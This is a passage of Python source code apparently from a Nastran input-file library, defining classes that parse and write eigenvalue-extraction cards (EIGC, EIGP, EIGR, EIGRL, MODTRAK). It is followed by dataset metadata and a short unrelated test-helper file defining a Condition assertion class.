| EIGC | SID | METHOD | | | | EPS | ND0 |
+------+---------+---------+---------+---------+---------+---------+-----+
| | ALPHAAj | OMEGAAj | ALPHABj | OMEGABj | Lj | NEj | NDj |
+------+---------+---------+---------+---------+---------+---------+-----+
``complex Lanczos``
+------+---------+---------+---------+---------+---------+---------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=========+=========+=========+=========+=========+=========+=====+
| | SHIFTRj | SHIFTIj | MBLKSZj | IBLKSZj | KSTEPSj | NDj | |
+------+---------+---------+---------+---------+---------+---------+-----+
``iterative Schur-Rayleigh-Ritz``
+------+---------+---------+---------+---------+---------+---------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=========+=========+=========+=========+=========+=========+=====+
| | SHIFTR1 | SHIFTI1 | | | | ISRRFLG | ND1 |
+------+---------+---------+---------+---------+---------+---------+-----+
"""
type = 'EIGC'
@classmethod
def _init_from_empty(cls):
sid = 1
method = 'CLAN'
grid = 1
component = 1
epsilon = 0.1
neigenvalues = 10
return EIGC(sid, method, grid, component, epsilon, neigenvalues,
norm='MAX', mblkszs=None, iblkszs=None, ksteps=None,
NJIs=None, alphaAjs=None, omegaAjs=None, alphaBjs=None,
omegaBjs=None, LJs=None, NEJs=None, NDJs=None,
shift_r1=None, shift_i1=None, isrr_flag=None, nd1=None, comment='')
def __init__(self, sid, method, grid, component, epsilon, neigenvalues,
norm='MAX', # common
mblkszs=None, iblkszs=None, ksteps=None, NJIs=None, # CLAN
alphaAjs=None, omegaAjs=None, alphaBjs=None, omegaBjs=None, # HESS/INV
LJs=None, NEJs=None, NDJs=None, # HESS/INV
shift_r1=None, shift_i1=None, isrr_flag=None, nd1=None, # ISRR
comment=''):
"""
Creates a EIGC card, which is required for a SOL 107 analysis
Parameters
----------
sid : int
CMETHOD id in the case control deck
method : str
Method of complex eigenvalue extraction
MSC 2014 = [INV, HESS, CLAN, IRAM]
NX 8.5 = [INV, HESS, CLAN, ISRR]
Autodesk 2015 = [ARNO, HESS, CLAN]
INV : Inverse Power
IRAM : Implicitly Restarted Arnoldi method
ISRR : Iterative Schur-Rayleigh-Ritz method
CLAN : Complex Lanczos. For linear perturbation of ANALYSIS=DCEIG
with large displacement, CLAN is recommended.
HESS : Upper Hessenberg. For linear perturbation of ANALYSIS=DCEIG
with large displacement, please don't use HESS.
ARNO: ???
norm : str; default='MAX'
Method for normalizing eigenvectors
valid_norm = {MAX, POINT}
grid : int
GRID/SPOINT id
Required if norm='POINT'
component : int
Required if norm='POINT'
epsilon : float
neigenvalues : int
Number of Eigenvalues
mblkszs : List[float]; default=None
used by CLAN
iblkszs : List[int]; default=None
used by CLAN
ksteps : List[int]; default=None
used by CLAN
NJIs : List[int]; default=None
used by CLAN
alphaAjs : List[float]; default=None
used by HESS/INV
omegaAjs : List[float]; default=None
used by HESS/INV
alphaBjs : List[float]; default=None
used by HESS/INV
omegaBjs : List[float]; default=None
used by HESS/INV
LJs : List[float]; default=None
used by HESS/INV
NEJs : List[int]; default=None
used by HESS/INV
NDJs : List[int]; default=None
used by HESS/INV
shift_r1 : List[float]; default=None
used by ISSR
shift_i1 : List[float]; default=None
used by ISSR
isrr_flag : List[int]; default=None
used by ISSR
nd1 : List[int]; default=None
used by ISSR
comment : str; default=''
a comment for the card
"""
Method.__init__(self)
if comment:
self.comment = comment
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Method of complex eigenvalue extraction
#: MSC 2014 = [INV, HESS, CLAN, IRAM]
#: NX 8.5 = [INV, HESS, CLAN, ISRR]
#: Autodesk 2015 = [ARNO, HESS, CLAN]
self.method = method
#: Method for normalizing eigenvectors
self.norm = norm
#: Grid or scalar point identification number. Required only if
#: NORM='POINT'. (Integer>0)
self.G = grid
#: Component number. Required only if NORM='POINT' and G is a
#: geometric grid point. (1<Integer<6)
self.C = component
#: Convergence criterion. (Real > 0.0. Default values are:
#: 10^-4 for METHOD = "INV",
#: 10^-8 for METHOD = "CLAN",
#: 10^-8 for METHOD = "ISRR",
#: 10^-15 for METHOD = "HESS",
#: E is machine dependent for METHOD = "CLAN".)
self.epsilon = epsilon
#Number of eigenvalues and/or eigenvectors desired. See Remark
#3. (Integer > 0 or blank; No default)
self.neigenvalues = neigenvalues
# CLAN
if mblkszs is None:
mblkszs = []
if iblkszs is None:
iblkszs = []
if ksteps is None:
ksteps = []
if NJIs is None:
NJIs = []
self.mblkszs = mblkszs
self.iblkszs = iblkszs
self.ksteps = ksteps
self.NJIs = NJIs
# HESS
if alphaBjs is None:
alphaBjs = []
if omegaBjs is None:
omegaBjs = []
self.alphaBjs = alphaBjs
self.omegaBjs = omegaBjs
if LJs is None:
LJs = []
self.LJs = LJs
if NEJs is None:
NEJs = []
self.NEJs = NEJs
if NDJs is None:
NDJs = []
self.NDJs = NDJs
if alphaAjs is None:
alphaAjs = []
if omegaAjs is None:
omegaAjs = []
self.alphaAjs = alphaAjs
self.omegaAjs = omegaAjs
#----------
# ISRR
self.shift_r1 = shift_r1
self.shift_i1 = shift_i1
self.isrr_flag = isrr_flag
self.nd1 = nd1
def validate(self):
assert self.norm in ['MAX', 'POINT'], 'norm=%r' % self.norm
nalpha_a = len(self.alphaAjs)
assert nalpha_a == len(self.omegaAjs), 'alphaAjs=%s omegaAj=%s' % (self.alphaAjs, self.omegaAjs)
if self.method in ['HESS', 'INV']:
assert nalpha_a == len(self.alphaBjs), 'alphaAjs=%s alphaBj=%s' % (self.alphaAjs, self.alphaBjs)
#assert nalpha_a == len(self.omegaBjs), 'alphaAjs=%s omegaBjs=%s' % (self.alphaAjs, self.omegaBjs)
assert nalpha_a == len(self.LJs), 'alphaAjs=%s LJs=%s' % (self.alphaAjs, self.LJs)
assert nalpha_a == len(self.NEJs), 'alphaAjs=%s NEJs=%s' % (self.alphaAjs, self.NEJs)
assert nalpha_a == len(self.NDJs), 'alphaAjs=%s NDJs=%s' % (self.alphaAjs, self.NDJs)
elif self.method == 'CLAN':
if nalpha_a == len(self.alphaBjs):
assert nalpha_a == len(self.alphaBjs), f'nalpha_a={nalpha_a} nalpha_b={nalpha_b}'
assert nalpha_a == len(self.omegaBjs), f'nalpha_a={nalpha_a} nomega_b={len(self.omegaBjs)}'
assert nalpha_a == len(self.LJs)
assert nalpha_a == len(self.NEJs)
assert nalpha_a == len(self.NDJs)
else:
assert nalpha_a == len(self.omegaAjs)
assert nalpha_a == len(self.mblkszs), 'alphaAjs=%s mblkszs=%s' % (self.alphaAjs, self.mblkszs)
assert nalpha_a == len(self.iblkszs)
assert nalpha_a == len(self.ksteps)
assert nalpha_a == len(self.NJIs)
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGC card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
method = string(card, 2, 'method')
assert method in ['ARNO', 'INV', 'HESS', 'CLAN', 'ISRR', 'IRAM', 'DET'], (
'method=%s is not ARNO, INV, HESS, CLAN, ISRR, IRAM, DET' % method)
norm = string_or_blank(card, 3, 'norm', 'MAX')
if norm == 'POINT':
grid = integer(card, 4, 'G')
component = parse_components(card, 5, 'C')
else:
grid = blank(card, 4, 'G')
component = blank(card, 5, 'C')
epsilon = double_or_blank(card, 6, 'epsilon')
neigenvalues = integer_double_string_or_blank(card, 7, 'ND0/neigenvalues')
# ALPHAAJ OMEGAAJ ALPHABJ OMEGABJ LJ NEJ NDJ
fields = [interpret_value(field) for field in card[9:]]
#-------CLAN--------------
mblkszs = []
iblkszs = []
ksteps = []
NJIs = []
#-------CLAN--------------
#-------HESS--------------
alphaAjs = []
alphaBjs = []
omegaAjs = []
omegaBjs = []
mblkszs = []
iblkszs = []
ksteps = []
LJs = []
NEJs = []
NDJs = []
#-------HESS--------------
#-------ISRR--------------
shift_r1 = 0.0
shift_i1 = 0.0
isrr_flag = 0
nd1 = None
#-------ISRR--------------
nfields = len(fields)
nrows = nfields // 8
if nfields % 8 > 0:
nrows += 1
#if nrows == 0:
#msg = 'invalid row count=0; nfields=%s \ncard=%s\nfields=%s' % (
#nfields, card, fields)
#raise RuntimeError(msg)
if method == 'CLAN':
out = _load_clan(nrows, card)
(alphaAjs, omegaAjs, mblkszs, iblkszs, ksteps, NJIs,
alphaBjs, omegaBjs, LJs, NEJs, NDJs) = out
elif method in ['HESS', 'INV', 'DET']: # HESS, INV
alphaAjs, omegaAjs, alphaBjs, omegaBjs, LJs, NEJs, NDJs = _load_hess_inv(
nrows, method, card)
elif method == 'ISRR':
shift_r1, shift_i1, isrr_flag, nd1 = _load_isrr(nrows, card)
else:
raise RuntimeError(f'invalid EIGC method...method={method!r}')
#assert card.nfields() < 8, 'card = %s' % card
return EIGC(sid, method, grid, component, epsilon, neigenvalues,
norm, # common
mblkszs, iblkszs, ksteps, NJIs, # CLAN
alphaAjs, omegaAjs, alphaBjs, omegaBjs, LJs, NEJs, NDJs, # HESS/INV
shift_r1, shift_i1, isrr_flag, nd1, # ISRR
comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_method(self):
list_fields = []
if self.method in ['HESS', 'INV', 'DET']:
for (alphaA, omegaA, alphaB, omegaB, Lj, NEj, NDj) in zip(
self.alphaAjs, self.omegaAjs, self.alphaBjs, self.omegaBjs,
self.LJs, self.NEJs, self.NDJs):
alphaA = set_blank_if_default(alphaA, 0.0)
omegaA = set_blank_if_default(omegaA, 0.0)
alphaB = set_blank_if_default(alphaB, 0.0)
omegaB = set_blank_if_default(omegaB, 0.0)
list_fields += [alphaA, omegaA, alphaB, omegaB, Lj, NEj, NDj, None]
elif self.method == 'CLAN':
nalpha_a = len(self.alphaAjs)
assert nalpha_a == len(self.omegaAjs)
if nalpha_a == len(self.alphaBjs): # pragma:no cover
assert nalpha_a == len(self.alphaBjs), f'nalpha_a={nalpha_a} nalpha_b={nalpha_b}'
assert nalpha_a == len(self.omegaBjs), f'nalpha_a={nalpha_a} nomega_b={len(self.omegaBjs)}'
assert nalpha_a == len(self.LJs)
assert nalpha_a == len(self.NEJs)
assert nalpha_a == len(self.NDJs)
for (alphaA, omegaA, alphaB, omegaB, Lj, Nej, Ndj) in zip(
self.alphaAjs, self.omegaAjs,
self.alphaBjs, self.omegaBjs,
self.LJs, self.NEJs, self.NDJs):
#alphaA = set_blank_if_default(alphaA, 0.0)
#omegaA = set_blank_if_default(omegaA, 0.0)
#mblksz = set_blank_if_default(mblksz, 7)
#iblksz = set_blank_if_default(iblksz, 2)
#kstep = set_blank_if_default(kstep, 5)
list_fields += [alphaA, omegaA, alphaB, omegaB, Lj,
Nej, Ndj, None]
else:
assert nalpha_a == len(self.mblkszs)
assert nalpha_a == len(self.iblkszs)
assert nalpha_a == len(self.ksteps)
assert nalpha_a == len(self.NJIs)
for (alphaA, omegaA, mblksz, iblksz, kstep, Nj) in zip(
self.alphaAjs, self.omegaAjs, self.mblkszs, self.iblkszs,
self.ksteps, self.NJIs):
alphaA = set_blank_if_default(alphaA, 0.0)
omegaA = set_blank_if_default(omegaA, 0.0)
mblksz = set_blank_if_default(mblksz, 7)
iblksz = set_blank_if_default(iblksz, 2)
kstep = set_blank_if_default(kstep, 5)
list_fields += [alphaA, omegaA, mblksz, iblksz,
kstep, None, Nj, None]
elif self.method == 'ISRR':
assert self.shift_r1 is not None, self.get_stats()
assert len(self.shift_r1) > 0, self.get_stats()
for shift_r1i, shift_i1i, isrr_flagi, nd1i in zip(
self.shift_r1, self.shift_i1, self.isrr_flag, self.nd1):
list_fields += [shift_r1i, shift_i1i, None, None, None, isrr_flagi, nd1i, None]
else:
raise RuntimeError(f'invalid EIGC method. method={self.method!r} '
'expected=[HESS, INV, DET, CLAN, ISRR]')
return list_fields
def repr_method(self):
return self.raw_method()
def raw_fields(self):
list_fields = ['EIGC', self.sid, self.method, self.norm, self.G, self.C,
self.epsilon, self.neigenvalues, None]
list_fields += self.raw_method()
return list_fields
def repr_fields(self):
if self.epsilon is None:
epsilon = None
else:
epsilon = self.epsilon
list_fields = ['EIGC', self.sid, self.method, self.norm, self.G, self.C,
epsilon, self.neigenvalues, None]
list_fields += self.repr_method()
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGP(Method):
"""
Defines poles that are used in complex eigenvalue extraction by the
Determinant method.
+------+-------+--------+--------+-------+--------+--------+-----+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+======+=======+========+========+=======+========+========+=====+
| EIGP | SID | ALPHA1 | OMEGA1 | M1 | ALPHA2 | OMEGA2 | M2 |
+------+-------+--------+--------+-------+--------+--------+-----+
| EIGP | 15 | -5.2 | 0.0 | 2 | 6.3 | 5.5 | 3 |
+------+-------+--------+--------+-------+--------+--------+-----+
"""
type = 'EIGP'
@classmethod
def _init_from_empty(cls):
sid = 1
alpha1 = 1.
omega1 = 1.
m1 = 1.
alpha2 = 1.
omega2 = 1.
m2 = 1.
return EIGP(sid, alpha1, omega1, m1, alpha2, omega2, m2, comment='')
def __init__(self, sid, alpha1, omega1, m1, alpha2, omega2, m2, comment=''):
Method.__init__(self)
if comment:
self.comment = comment
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Coordinates of point in complex plane. (Real)
self.alpha1 = alpha1
#: Coordinates of point in complex plane. (Real)
self.omega1 = omega1
#: Multiplicity of complex root at pole defined by point at ALPHAi
#: and OMEGAi
self.m1 = m1
#: Coordinates of point in complex plane. (Real)
self.alpha2 = alpha2
#: Coordinates of point in complex plane. (Real)
self.omega2 = omega2
#: Multiplicity of complex root at pole defined by point at ALPHAi
#: and OMEGAi
self.m2 = m2
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGPX card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
alpha1 = double(card, 2, 'alpha1')
omega1 = double(card, 3, 'omega1')
m1 = integer(card, 4, 'm1')
alpha2 = double(card, 5, 'alpha2')
omega2 = double(card, 6, 'omega2')
m2 = integer(card, 7, 'm2')
assert len(card) == 8, f'len(EIGP card) = {len(card):d}\ncard={card}'
return EIGP(sid, alpha1, omega1, m1, alpha2, omega2, m2, comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_fields(self):
list_fields = ['EIGP', self.sid, self.alpha1, self.omega1, self.m1,
self.alpha2, self.omega2, self.m2]
return list_fields
def repr_fields(self):
return self.raw_fields()
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGR(Method):
"""
Defines data needed to perform real eigenvalue analysis
# msc/nx
| EIGR | SID | METH| F1 | F2 | NE | ND | | |
| | NORM | G | C | | | | | |
# mystran
| EIGR | SID | METH| F1 | F2 | NE | ND | | CRIT |
| | NORM | G | C | | | | | |
"""
type = 'EIGR'
allowed_methods = [
'LAN', 'AHOU', # recommended
'INV', 'SINV', 'GIV', 'MGIV', 'HOU', 'MHOU', 'AGIV' # obsolete
]
@classmethod
def _init_from_empty(cls):
sid = 1
return EIGR(sid, method='LAN', f1=None, f2=None, ne=None, nd=None, crit=None,
norm='MASS', G=None, C=None, comment='')
def __init__(self, sid, method='LAN', f1=None, f2=None, ne=None, nd=None, crit=None,
norm='MASS', G=None, C=None, comment=''):
"""
Adds a EIGR card
Parameters
----------
sid : int
method id
method : str; default='LAN'
eigenvalue method
recommended: {LAN, AHOU}
obsolete : {INV, SINV, GIV, MGIV, HOU, MHOU, AGIV}
f1 / f2 : float; default=None
lower/upper bound eigenvalue
f2 : float; default=None
upper bound eigenvalue
ne : int; default=None
estimate of number of roots (used for INV)
nd : int; default=None
desired number of roots
crit : float; default=0.0
orthogonality criteria
msglvl : int; default=0
debug level; 0-4
maxset : int; default=None
Number of vectors in block or set
shfscl : float; default=None
estimate of first flexible mode natural frequency
norm : str; default=None
{MAX, MASS, AF, POINT}
default=MASS (NX)
G : int; default=None
node id for normalization; only for POINT
C : int; default=None
component for normalization (1-6); only for POINT
comment : str; default=''
a comment for the card
"""
Method.__init__(self)
if comment:
self.comment = comment
if G == 0:
G = None
if C == 0:
C = None
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: Method of eigenvalue extraction. (Character: 'INV' for inverse
#: power method or 'SINV' for enhanced inverse power method.)
self.method = method
#: Frequency range of interest
self.f1 = f1
self.f2 = f2
#: Estimate of number of roots in range (Required for
#: METHOD = 'INV'). Not used by 'SINV' method.
self.ne = ne
#: Desired number of roots (default=600 for SINV 3*ne for INV)
self.nd = nd
#: orthogonality criterion
self.crit = crit
#: Method for normalizing eigenvectors. ('MAX' or 'POINT';
#: Default='MAX')
self.norm = norm
#: Grid or scalar point identification number. Required only if
#: NORM='POINT'. (Integer>0)
self.G = G
#: Component number. Required only if NORM='POINT' and G is a
#: geometric grid point. (1<Integer<6)
self.C = C
if self.method not in self.allowed_methods:
msg = 'method=%s; allowed_methods=[%s]' % (
self.method, ', '.join(self.allowed_methods))
raise ValueError(msg)
assert norm in ['POINT', 'MASS', 'MAX']
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGR card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
method = string_or_blank(card, 2, 'method', 'LAN')
f1 = double_or_blank(card, 3, 'f1')
f2 = double_or_blank(card, 4, 'f2')
ne = integer_or_blank(card, 5, 'ne')
if method not in cls.allowed_methods:
msg = 'method=%s; allowed_methods=[%s]' % (
method, ', '.join(cls.allowed_methods))
raise ValueError(msg)
if method == 'SINV':
nd = integer_or_blank(card, 6, 'nd', 600)
elif method == 'INV':
ne = integer(card, 5, 'ne')
nd = integer_or_blank(card, 6, 'nd', 3 * ne)
elif method in ['GIV', 'MGIV', 'HOU', 'MHOU']:
nd = integer_or_blank(card, 6, 'nd', 0)
else:
nd = integer(card, 6, 'nd')
crit = double_or_blank(card, 8, 'crit')
norm = string_or_blank(card, 9, 'norm', 'MASS')
if norm == 'POINT':
G = integer(card, 10, 'G')
C = parse_components(card, 11, 'C')
else:
G = blank(card, 10, 'G')
C = blank(card, 11, 'C')
assert len(card) <= 12, f'len(EIGR card) = {len(card):d}\ncard={card}'
return EIGR(sid, method, f1, f2, ne, nd,
crit=crit, norm=norm, G=G, C=C, comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
def raw_fields(self):
list_fields = ['EIGR', self.sid, self.method, self.f1, self.f2, self.ne,
self.nd, None, None, self.norm, self.G, self.C]
return list_fields
def repr_fields(self):
method = set_blank_if_default(self.method, 'LAN')
norm = set_blank_if_default(self.norm, 'MASS')
list_fields = ['EIGR', self.sid, method, self.f1, self.f2, self.ne,
self.nd, None, None, norm, self.G, self.C]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
class EIGRL(Method):
"""
Defines data needed to perform real eigenvalue (vibration or buckling)
analysis with the Lanczos method
+-------+-----+----+----+----+--------+--------+--------+------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
+=======+=====+====+====+====+========+========+========+======+
| EIGRL | SID | V1 | V2 | ND | MSGLVL | MAXSET | SHFSCL | NORM |
+-------+-----+----+----+----+--------+--------+--------+------+
| option_1 = value_1 option_2 = value_2, etc. |
+--------------------------------------------------------------+
"""
type = 'EIGRL'
@classmethod
def _init_from_empty(cls):
sid = 1
return EIGRL(sid, v1=None, v2=None, nd=None, msglvl=0, maxset=None,
shfscl=None, norm=None, options=None, values=None, comment='')
def __init__(self, sid, v1=None, v2=None, nd=None, msglvl=0, maxset=None, shfscl=None,
norm=None, options=None, values=None, comment=''):
"""
Adds an EIGRL card
Parameters
----------
sid : int
method id
v1 : float; default=None
lower bound eigenvalue
v2 : float; default=None
upper bound eigenvalue
nd : int
number of roots
msglvl : int; default=0
debug level; 0-4
maxset : int; default=None
Number of vectors in block or set
shfscl : float; default=None
estimate of first flexible mode natural frequency
norm : str; default=None
{MAX, MASS, AF}
options : ???; default=None -> []
???
values : ???; default=None -> []
???
comment : str; default=''
a comment for the card
"""
Method.__init__(self)
if comment:
self.comment = comment
if options is None:
options = []
if values is None:
values = []
#: Set identification number. (Unique Integer > 0)
self.sid = sid
#: For vibration analysis: frequency range of interest. For
#: buckling analysis: eigenvalue range of interest. See Remark 4.
#: (Real or blank, -5 10e16 <= V1 < V2 <= 5.10e16)
self.v1 = v1
self.v2 = v2
#: Number of roots desired
self.nd = nd
#: Diagnostic level. (0 < Integer < 4; Default = 0)
self.msglvl = msglvl
#: Number of vectors in block or set. Default is machine dependent
self.maxset = maxset
#: Estimate of the first flexible mode natural frequency
#: (Real or blank)
self.shfscl = shfscl
#: Method for normalizing eigenvectors (Character: 'MASS' or 'MAX')
self.norm = norm
self.options = options
self.values = values
def validate(self):
assert self.norm in [None, 'MAX', 'MASS', 'AF'], 'norm=%r' % self.norm
assert self.msglvl in [0, 1, 2, 3, 4], 'msglvl=%r' % self.msglvl
if len(self.options) != len(self.values):
raise RuntimeError('len(options) != len(values); noptions=%s nvalues=%s\n'
'options=%s values=%s' % (len(self.options), len(self.values),
self.options, self.values))
for option, value in zip(self.options, self.values):
if option == 'NORM':
assert value in ['MAX', ], 'option=%r value=%r' % (option, value)
elif option == 'ALPH':
# float
pass
elif option == 'NUMS':
# integer
pass
else:
raise NotImplementedError('option=%r value=%r' % (option, value))
@classmethod
def add_card(cls, card, comment=''):
"""
Adds an EIGRL card from ``BDF.add_card(...)``
Parameters
----------
card : BDFCard()
a BDFCard object
comment : str; default=''
a comment for the card
"""
sid = integer(card, 1, 'sid')
v1 = double_or_blank(card, 2, 'v1')
v2 = double_or_blank(card, 3, 'v2')
nd = integer_or_blank(card, 4, 'nd')
msglvl = integer_or_blank(card, 5, 'msglvl', 0)
maxset = integer_or_blank(card, 6, 'maxset')
shfscl = double_or_blank(card, 7, 'shfscl')
norm = string_or_blank(card, 8, 'norm')
option_values = [interpret_value(field) for field in card[9:]]
options = []
values = []
for option_value in option_values:
try:
(option, value) = option_value.split('=')
except AttributeError:
msg = 'parsing EIGRL card incorrectly; option_values=%s\ncard=%s' % (
option_values, card)
raise RuntimeError(msg)
options.append(option)
values.append(value)
#: Method for normalizing eigenvectors
#if sol in [103, 115, 146]:
## normal modes,cyclic normal modes, flutter
#self.norm = string_or_blank(card, 8, 'norm', 'MASS')
#elif sol in [105, 110, 111, 116]:
## buckling, modal complex eigenvalues,
## modal frequency response,cyclic buckling
#self.norm = string_or_blank(card, 8, 'norm', 'MAX')
#else:
norm = string_or_blank(card, 8, 'norm')
#assert len(card) <= 9, f'len(EIGRL card) = {len(card):d}\ncard={card}'
assert len(card) <= 10, f'len(EIGRL card) = {len(card):d}\ncard={card}'
#msg = 'norm=%s sol=%s' % (self.norm, sol)
#assert self.norm in ['MASS', 'MAX'],msg
#assert len(card) < 9,'card = %s' % (card.fields(0))
return EIGRL(sid, v1, v2, nd, msglvl, maxset, shfscl, norm,
options, values, comment=comment)
def cross_reference(self, model: BDF) -> None:
pass
#if self.norm is None:
#if model.is_modal_solution():
#self.norm = 'MASS'
#elif model.is_buckling_solution():
#self.norm = 'MAX'
def raw_fields(self):
list_fields = ['EIGRL', self.sid, self.v1, self.v2, self.nd,
self.msglvl, self.maxset, self.shfscl, self.norm]
for (option, value) in zip(self.options, self.values):
list_fields += [option + '=' + str(value)]
return list_fields
def repr_fields(self):
msglvl = set_blank_if_default(self.msglvl, 0)
list_fields = ['EIGRL', self.sid, self.v1, self.v2, self.nd, msglvl,
self.maxset, self.shfscl, self.norm]
for (option, value) in zip(self.options, self.values):
list_fields += [option + '=' + str(value)]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
card = self.repr_fields()
if size == 8:
return self.comment + print_card_8(card)
return self.comment + print_card_16(card)
def _load_isrr(nrows, card):
"""loads the iterative Schur-Rayleigh-Ritz"""
shift_r1 = []
shift_i1 = []
isrr_flag = []
nd1 = []
for irow in range(nrows):
i = 9 + 8 * irow
shift_r1i = double_or_blank(card, i, 'SHIFT_R1', 0.0)
shift_i1i = double_or_blank(card, i + 1, 'SHIFT_I1', 0.0)
#2
#3
#4
isrr_flagi = integer_or_blank(card, i + 5, 'ISRR_FLAG', 0)
nd1i = integer(card, i + 6, 'ND1')
shift_r1.append(shift_r1i)
shift_i1.append(shift_i1i)
isrr_flag.append(isrr_flagi)
nd1.append(nd1i)
return shift_r1, shift_i1, isrr_flag, nd1
def _load_clan(nrows, card):
"""loads complex Lanczos"""
alphaAjs = []
omegaAjs = []
mblkszs = []
iblkszs = []
ksteps = []
NJIs = []
alphaBjs = []
omegaBjs = []
ljs = []
nejs = []
ndjs = []
is_nej = None
for irow in range(nrows):
#NDJ_default = None
i = 9 + 8 * irow
alphaAjs.append(
double_or_blank(card, i, 'alpha' + str(irow), 0.0))
omegaAjs.append(
double_or_blank(card, i + 1, 'omega' + str(irow), 0.0))
nej_blank = integer_or_blank(card, i + 6, 'NEJ_blank')
if nej_blank is not None and 0: # pragma: no cover
assert is_nej in [True, None], is_nej
is_nej = True
# ALPHAAJ OMEGAAJ ALPHABJ OMEGABJ LJ NEJ NDJ
assert isinstance(nej_blank, int), nej_blank
alpha_bj = double(card, i + 2, 'alpha_bj' + str(irow))
omega_bj = double(card, i + 3, 'omega_bj' + str(irow))
lj = double_or_blank(card, i + 4, 'LJ' + str(irow), 1.0)
nej = integer_or_blank(card, i + 5, 'NEJ' + str(irow))
ndj = integer(card, i + 6, 'NDJ' + str(irow))
alphaBjs.append(alpha_bj)
omegaBjs.append(omega_bj)
ljs.append(lj)
nejs.append(nej)
ndjs.append(ndj)
else:
assert is_nej in [False, None], is_nej
is_nej = False
# ALPHAAJ OMEGAAJ MBLKSZ IBLKSZ KSTEPS blank NJi
mblock_size = double_or_blank(card, i + 2, 'mblock' + str(irow), 7)
# iblkszs is an integer, but entered as a float...
iblock_size = double_or_blank(card, i + 3, 'iblksz' + str(irow), 2.0)
kstep = integer_or_blank(card, i + 4, 'kstep' + str(irow), 5)
nji = integer(card, i + 6, 'NJI' + str(irow))
mblkszs.append(mblock_size)
iblkszs.append(iblock_size)
ksteps.append(kstep)
NJIs.append(nji)
out = (
alphaAjs, omegaAjs, mblkszs, iblkszs, ksteps, NJIs,
alphaBjs, omegaBjs, ljs, nejs, ndjs,
)
return out
def _load_hess_inv(nrows, method, card):
"""loads inverse power"""
alpha_omega_default = None
LJ_default = None
if method == 'INV':
alpha_omega_default = 0.0
LJ_default = 1.0
alphaAjs = []
alphaBjs = []
omegaAjs = []
omegaBjs = []
#mblkszs = []
#iblkszs = []
#ksteps = []
LJs = []
NEJs = []
NDJs = []
for irow in range(nrows):
NEj = integer_or_blank(card, 9 + 7 * irow + 5, 'NE%s' % str(irow), 0)
NDJ_default = None
if method == 'INV':
NDJ_default = 3 * NEj
i = 9 + 8 * irow
alphaAjs.append(
double_or_blank(card, i, 'alphaA' + str(irow), alpha_omega_default))
omegaAjs.append(
double_or_blank(card, i + 1, 'omegaA' + str(irow), alpha_omega_default))
alphaBjs.append(
double_or_blank(card, i + 2, 'alphaB' + str(irow), alpha_omega_default))
omegaBjs.append(
double_or_blank(card, i + 3, 'omegaB' + str(irow), alpha_omega_default))
LJs.append(
double_or_blank(card, i + 4, 'LJ' + str(irow), LJ_default))
NEJs.append(NEj)
NDJs.append(integer_or_blank(card, i + 6, 'NDJ' + str(irow), NDJ_default))
return alphaAjs, omegaAjs, alphaBjs, omegaBjs, LJs, NEJs, NDJs
class MODTRAK(BaseCard):
"""
MODTRAK SID LOWRNG HIGHRNG MTFILTER
MODTRAK 100 1 26 0.80
"""
def __init__(self, sid, low_range, high_range, mt_filter, comment=''):
BaseCard.__init__(self)
self.sid = sid
self.low_range = low_range
self.high_range = high_range
self.mt_filter = mt_filter
@classmethod
def add_card(cls, card, comment=''):
sid = integer(card, 1, 'sid')
low_range = integer_or_blank(card, 2, 'low_range', 0)
high_range = integer(card, 3, 'high_range')
mt_filter = double_or_blank(card, 4, 'mt_filter', 0.9)
return MODTRAK(sid, low_range, high_range, mt_filter, comment=comment)
def raw_fields(self) -> List[Any]:
list_fields = ['MODTRAK', self.sid, self.low_range, self.high_range, self.mt_filter]
return list_fields
def write_card(self, size: int=8, is_double: bool=False) -> str:
fields = self.raw_fields()
#if size == 8:
return self.comment + print_card_8(fields)
#return self.comment + print_card_16(fields)
| 35.795047
| 110
| 0.516676
|
f6da5428789043e08eb9f1ce35cedf0b3fe38998
| 362
|
py
|
Python
|
screenplay/screenplay/condition.py
|
jack-skerrett-bluefruit/Python-ScreenPlay
|
045486bdf441fa3a7a6cde59e7b7e12a7d53fbed
|
[
"MIT"
] | null | null | null |
screenplay/screenplay/condition.py
|
jack-skerrett-bluefruit/Python-ScreenPlay
|
045486bdf441fa3a7a6cde59e7b7e12a7d53fbed
|
[
"MIT"
] | null | null | null |
screenplay/screenplay/condition.py
|
jack-skerrett-bluefruit/Python-ScreenPlay
|
045486bdf441fa3a7a6cde59e7b7e12a7d53fbed
|
[
"MIT"
] | null | null | null |
from .question import Question
from .matcher import Matcher
class Condition:
def __init__(self, question: Question, expected: Matcher):
self.question = question
self.expected = expected
def check_as(self, actor):
assert self.expected.matches(self.question.answered_by(actor)), self.expected.fail_message
see_that = Condition
| 24.133333
| 98
| 0.729282
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.